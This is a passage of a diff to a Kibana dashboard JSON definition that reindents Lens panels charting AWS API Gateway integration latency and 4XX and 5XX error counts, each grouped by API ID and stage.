- } + "title": "Latency" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "21ea8ee2-05f0-4a71-a46a-fe4ab6c3db94", + "w": 24, + "x": 24, + "y": 22 + }, + "panelIndex": "21ea8ee2-05f0-4a71-a46a-fe4ab6c3db94", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "name": "indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", + "id": "metrics-*", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ff2c6fd1-df0b-409d-a7e7-033a129edba3": { + "columnOrder": [ + "f87d2d15-ecd3-4cf3-85e5-911976418f35", + "21bcc448-3bbc-4949-8471-40e126445935", + "11242c77-c1e8-482f-a8ab-d14342367450" + ], + "columns": { + "11242c77-c1e8-482f-a8ab-d14342367450": { + "dataType": "number", + "isBucketed": false, + "label": "Average of aws.apigateway.metrics.IntegrationLatency.avg", + 
"operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "ms" } - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.IntegrationLatency.avg" + } + }, + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.IntegrationLatency.avg" + }, + "21bcc448-3bbc-4949-8471-40e126445935": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" }, - "21bcc448-3bbc-4949-8471-40e126445935": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" + "scale": "interval", + "sourceField": "@timestamp" + }, + "f87d2d15-ecd3-4cf3-85e5-911976418f35": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of aws.dimensions.ApiId + 1 other", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "11242c77-c1e8-482f-a8ab-d14342367450", + "type": "column" }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "f87d2d15-ecd3-4cf3-85e5-911976418f35": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of aws.dimensions.ApiId + 1 other", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "11242c77-c1e8-482f-a8ab-d14342367450", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "aws.dimensions.Stage" - ], - "size": 10 + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" }, - "scale": 
"ordinal", - "sourceField": "aws.dimensions.ApiId" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } + "secondaryFields": [ + "aws.dimensions.Stage" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.ApiId" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.Count.sum", - "key": "aws.apigateway.metrics.Count.sum", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.Count.sum" - } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.Count.sum", + "key": "aws.apigateway.metrics.Count.sum", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.Count.sum" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.IntegrationLatency.avg", - "key": "aws.apigateway.metrics.IntegrationLatency.avg", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.IntegrationLatency.avg" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.IntegrationLatency.avg", + "key": "aws.apigateway.metrics.IntegrationLatency.avg", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.IntegrationLatency.avg" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "negate": false, - "params": [ - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.ApiId", - "index": "metrics-*", - "key": "aws.dimensions.ApiId", - "negate": false, - 
"type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.ApiId" - } + "meta": { + "alias": null, + "disabled": false, + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.ApiId", + "index": "metrics-*", + "key": "aws.dimensions.ApiId", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.ApiId" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Stage", + "index": "metrics-*", + "key": "aws.dimensions.Stage", + "negate": false, + "type": "exists", + "value": "exists" }, - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Stage", - "index": "metrics-*", - "key": "aws.dimensions.Stage", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Stage" - } + "query": { + "exists": { + "field": "aws.dimensions.Stage" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Method", - "index": "metrics-*", - "key": "aws.dimensions.Method", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Method" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Method", + "index": "metrics-*", + "key": "aws.dimensions.Method", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Method" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Resource", - "index": "metrics-*", - "key": "aws.dimensions.Resource", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - 
"field": "aws.dimensions.Resource" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Resource", + "index": "metrics-*", + "key": "aws.dimensions.Resource", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Resource" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Route", - "index": "metrics-*", - "key": "aws.dimensions.Route", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Route" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Route", + "index": "metrics-*", + "key": "aws.dimensions.Route", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Route" } } - ], - "relation": "AND", - "type": "combined" - }, - "query": {} - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "CURVE_MONOTONE_X", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "11242c77-c1e8-482f-a8ab-d14342367450" - ], - "layerId": "ff2c6fd1-df0b-409d-a7e7-033a129edba3", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "f87d2d15-ecd3-4cf3-85e5-911976418f35", - "xAccessor": "21bcc448-3bbc-4949-8471-40e126445935" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true + } + 
], + "relation": "AND", + "type": "combined" }, - "valueLabels": "hide" + "query": {} } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "CURVE_MONOTONE_X", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "11242c77-c1e8-482f-a8ab-d14342367450" + ], + "layerId": "ff2c6fd1-df0b-409d-a7e7-033a129edba3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "f87d2d15-ecd3-4cf3-85e5-911976418f35", + "xAccessor": "21bcc448-3bbc-4949-8471-40e126445935" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - "enhancements": {}, - "hidePanelTitles": false + "title": "", + "type": "lens", + "visualizationType": "lnsXY" }, - "title": "Integration Latency" + "enhancements": {}, + "hidePanelTitles": false }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 15, - "i": "1c8bb14c-861c-4681-923f-85ec02c508ee", - "w": 24, - "x": 0, - "y": 37 - }, - "panelIndex": "1c8bb14c-861c-4681-923f-85ec02c508ee", - "embeddableConfig": { - "attributes": { - "title": "", - "description": "", - "visualizationType": "lnsXY", - "type": "lens", - "references": [ - { - "type": "index-pattern", - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5e9706cb-90ee-4f08-af6a-f2a8048628af" - } - ], - "state": { - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fittingFunction": 
"None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "cd10361b-ce2e-454c-8612-6be186ffefac" - ], - "layerId": "5e9706cb-90ee-4f08-af6a-f2a8048628af", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "c0d552ba-af46-4959-a9f9-be4bfcb553ec", - "xAccessor": "688be07c-0c70-400a-a931-6abee54ce8e6" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yTitle": "" + "title": "Integration Latency" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "1c8bb14c-861c-4681-923f-85ec02c508ee", + "w": 24, + "x": 0, + "y": 37 + }, + "panelIndex": "1c8bb14c-861c-4681-923f-85ec02c508ee", + "embeddableConfig": { + "attributes": { + "title": "", + "description": "", + "visualizationType": "lnsXY", + "type": "lens", + "references": [ + { + "type": "index-pattern", + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5e9706cb-90ee-4f08-af6a-f2a8048628af" + } + ], + "state": { + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "query": { - "language": "kuery", - "query": "" + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "filters": [ + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.4xx.sum", - "key": "aws.apigateway.metrics.4xx.sum", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.4xx.sum" - } - }, - "$state": { - "store": "appState" + 
"accessors": [ + "cd10361b-ce2e-454c-8612-6be186ffefac" + ], + "layerId": "5e9706cb-90ee-4f08-af6a-f2a8048628af", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "c0d552ba-af46-4959-a9f9-be4bfcb553ec", + "xAccessor": "688be07c-0c70-400a-a931-6abee54ce8e6" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yTitle": "" + }, + "query": { + "language": "kuery", + "query": "" + }, + "filters": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.4xx.sum", + "key": "aws.apigateway.metrics.4xx.sum", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.4xx.sum" } }, - { - "meta": { - "alias": null, - "disabled": false, - "negate": false, - "params": [ - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.ApiId", - "index": "metrics-*", - "key": "aws.dimensions.ApiId", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.ApiId" - } + "$state": { + "store": "appState" + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.ApiId", + "index": "metrics-*", + "key": "aws.dimensions.ApiId", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.ApiId" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Stage", + "index": "metrics-*", + "key": "aws.dimensions.Stage", + "negate": false, + "type": "exists", + "value": "exists" }, - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Stage", 
- "index": "metrics-*", - "key": "aws.dimensions.Stage", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Stage" - } + "query": { + "exists": { + "field": "aws.dimensions.Stage" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Method", - "index": "metrics-*", - "key": "aws.dimensions.Method", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Method" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Method", + "index": "metrics-*", + "key": "aws.dimensions.Method", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Method" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Resource", - "index": "metrics-*", - "key": "aws.dimensions.Resource", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Resource" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Resource", + "index": "metrics-*", + "key": "aws.dimensions.Resource", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Resource" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Route", - "index": "metrics-*", - "key": "aws.dimensions.Route", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Route" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Route", + 
"index": "metrics-*", + "key": "aws.dimensions.Route", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Route" } } - ], - "relation": "AND", - "type": "combined" - }, - "query": {}, - "$state": { - "store": "appState" - } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {}, + "$state": { + "store": "appState" } - ], - "datasourceStates": { - "formBased": { - "layers": { - "5e9706cb-90ee-4f08-af6a-f2a8048628af": { - "columnOrder": [ - "c0d552ba-af46-4959-a9f9-be4bfcb553ec", - "688be07c-0c70-400a-a931-6abee54ce8e6", - "cd10361b-ce2e-454c-8612-6be186ffefac" - ], - "columns": { - "688be07c-0c70-400a-a931-6abee54ce8e6": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" + } + ], + "datasourceStates": { + "formBased": { + "layers": { + "5e9706cb-90ee-4f08-af6a-f2a8048628af": { + "columnOrder": [ + "c0d552ba-af46-4959-a9f9-be4bfcb553ec", + "688be07c-0c70-400a-a931-6abee54ce8e6", + "cd10361b-ce2e-454c-8612-6be186ffefac" + ], + "columns": { + "688be07c-0c70-400a-a931-6abee54ce8e6": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" }, - "c0d552ba-af46-4959-a9f9-be4bfcb553ec": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of aws.dimensions.ApiId + 1 other", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "cd10361b-ce2e-454c-8612-6be186ffefac", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - 
"aws.dimensions.Stage" - ], - "size": 10 + "scale": "interval", + "sourceField": "@timestamp" + }, + "c0d552ba-af46-4959-a9f9-be4bfcb553ec": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of aws.dimensions.ApiId + 1 other", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "cd10361b-ce2e-454c-8612-6be186ffefac", + "type": "column" }, - "scale": "ordinal", - "sourceField": "aws.dimensions.ApiId" - }, - "cd10361b-ce2e-454c-8612-6be186ffefac": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of aws.apigateway.metrics.4xx.sum per second", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 0 - } - } + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.4xx.sum", - "timeScale": "s" - } + "secondaryFields": [ + "aws.dimensions.Stage" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.ApiId" }, - "incompleteColumns": {}, - "sampling": 1 - } + "cd10361b-ce2e-454c-8612-6be186ffefac": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of aws.apigateway.metrics.4xx.sum per second", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.4xx.sum", + "timeScale": "s" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "internalReferences": [], - "adHocDataViews": {} - } - }, - "enhancements": {}, - "hidePanelTitles": false + } + }, + "internalReferences": [], + "adHocDataViews": {} + } }, - "title": "4XX Error" + "enhancements": {}, + "hidePanelTitles": false }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 15, - "i": 
"1a3ffddd-99ee-4555-b092-94984db3de9e", - "w": 24, - "x": 24, - "y": 37 - }, - "panelIndex": "1a3ffddd-99ee-4555-b092-94984db3de9e", - "embeddableConfig": { - "attributes": { - "title": "", - "description": "", - "visualizationType": "lnsXY", - "type": "lens", - "references": [ - { - "type": "index-pattern", - "id": "metrics-*", - "name": "indexpattern-datasource-layer-da960427-d6bb-4f17-a5ac-9be25356186a" - } - ], - "state": { - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "53bb15bf-1d19-4aaa-be68-5015b194e60b" - ], - "layerId": "da960427-d6bb-4f17-a5ac-9be25356186a", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", - "xAccessor": "7af933af-8c3e-47b8-9e15-9cd504966672" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yTitle": "" + "title": "4XX Error" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "1a3ffddd-99ee-4555-b092-94984db3de9e", + "w": 24, + "x": 24, + "y": 37 + }, + "panelIndex": "1a3ffddd-99ee-4555-b092-94984db3de9e", + "embeddableConfig": { + "attributes": { + "title": "", + "description": "", + "visualizationType": "lnsXY", + "type": "lens", + "references": [ + { + "type": "index-pattern", + "id": "metrics-*", + "name": "indexpattern-datasource-layer-da960427-d6bb-4f17-a5ac-9be25356186a" + } + ], + "state": { + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "query": { - 
"language": "kuery", - "query": "" + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "filters": [ + "layers": [ { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.5xx.sum", - "key": "aws.apigateway.metrics.5xx.sum", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.5xx.sum" - } - }, - "$state": { - "store": "appState" + "accessors": [ + "53bb15bf-1d19-4aaa-be68-5015b194e60b" + ], + "layerId": "da960427-d6bb-4f17-a5ac-9be25356186a", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", + "xAccessor": "7af933af-8c3e-47b8-9e15-9cd504966672" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yTitle": "" + }, + "query": { + "language": "kuery", + "query": "" + }, + "filters": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.5xx.sum", + "key": "aws.apigateway.metrics.5xx.sum", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.5xx.sum" } }, - { - "meta": { - "alias": null, - "disabled": false, - "negate": false, - "params": [ - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.ApiId", - "index": "metrics-*", - "key": "aws.dimensions.ApiId", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.ApiId" - } + "$state": { + "store": "appState" + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "negate": false, + "params": [ + { + "meta": { + "alias": 
null, + "disabled": false, + "field": "aws.dimensions.ApiId", + "index": "metrics-*", + "key": "aws.dimensions.ApiId", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.ApiId" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Stage", + "index": "metrics-*", + "key": "aws.dimensions.Stage", + "negate": false, + "type": "exists", + "value": "exists" }, - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Stage", - "index": "metrics-*", - "key": "aws.dimensions.Stage", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Stage" - } + "query": { + "exists": { + "field": "aws.dimensions.Stage" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Method", - "index": "metrics-*", - "key": "aws.dimensions.Method", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Method" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Method", + "index": "metrics-*", + "key": "aws.dimensions.Method", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Method" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Resource", - "index": "metrics-*", - "key": "aws.dimensions.Resource", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Resource" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Resource", + "index": "metrics-*", + "key": "aws.dimensions.Resource", + "negate": true, + "type": 
"exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Resource" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Route", - "index": "metrics-*", - "key": "aws.dimensions.Route", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Route" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Route", + "index": "metrics-*", + "key": "aws.dimensions.Route", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Route" } } - ], - "relation": "AND", - "type": "combined" - }, - "query": {}, - "$state": { - "store": "appState" - } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {}, + "$state": { + "store": "appState" } - ], - "datasourceStates": { - "formBased": { - "layers": { - "da960427-d6bb-4f17-a5ac-9be25356186a": { - "columnOrder": [ - "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", - "7af933af-8c3e-47b8-9e15-9cd504966672", - "53bb15bf-1d19-4aaa-be68-5015b194e60b" - ], - "columns": { - "53bb15bf-1d19-4aaa-be68-5015b194e60b": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of aws.apigateway.metrics.5xx.sum", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 0 - } + } + ], + "datasourceStates": { + "formBased": { + "layers": { + "da960427-d6bb-4f17-a5ac-9be25356186a": { + "columnOrder": [ + "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", + "7af933af-8c3e-47b8-9e15-9cd504966672", + "53bb15bf-1d19-4aaa-be68-5015b194e60b" + ], + "columns": { + "53bb15bf-1d19-4aaa-be68-5015b194e60b": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of aws.apigateway.metrics.5xx.sum", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": 
"number", + "params": { + "decimals": 0 } - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.5xx.sum" + } }, - "7af933af-8c3e-47b8-9e15-9cd504966672": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.5xx.sum" + }, + "7af933af-8c3e-47b8-9e15-9cd504966672": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" }, - "c6eaba88-8446-4a94-b32b-e0f6cc784fc2": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of aws.dimensions.ApiId + 1 other", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "53bb15bf-1d19-4aaa-be68-5015b194e60b", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "aws.dimensions.Stage" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "aws.dimensions.ApiId" - } + "scale": "interval", + "sourceField": "@timestamp" }, - "incompleteColumns": {}, - "sampling": 1 - } + "c6eaba88-8446-4a94-b32b-e0f6cc784fc2": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of aws.dimensions.ApiId + 1 other", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "53bb15bf-1d19-4aaa-be68-5015b194e60b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + 
